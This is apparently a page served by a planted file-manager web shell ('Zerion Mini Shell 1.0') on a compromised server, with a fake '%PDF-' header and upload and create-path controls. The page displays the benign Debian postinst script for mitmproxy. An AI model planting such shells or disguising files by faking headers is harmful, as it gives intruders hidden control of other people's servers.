%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/lib/dpkg/info/
Upload File :
Create Path :
Current File : //var/lib/dpkg/info/mitmproxy.postinst

#!/bin/sh
set -e

# Automatically added by dh_python3
if which py3compile >/dev/null 2>&1; then
	py3compile -p mitmproxy 
fi
if which pypy3compile >/dev/null 2>&1; then
	pypy3compile -p mitmproxy  || true
fi

# End automatically added section
# Automatically added by dh_installdeb/13.3ubuntu4
dpkg-maintscript-helper dir_to_symlink /usr/lib/python3/dist-packages/mitmproxy/addons/onboardingapp/static/fontawesome ../../../../../../share/fonts-font-awesome 1.0.2\+dfsg-1\~ -- "$@"
dpkg-maintscript-helper dir_to_symlink /usr/lib/python3/dist-packages/mitmproxy/tools/web/static/fonts ../../../../../../share/fonts-font-awesome/fonts 1.0.2\+dfsg-1\~ -- "$@"
# End automatically added section

Zerion Mini Shell 1.0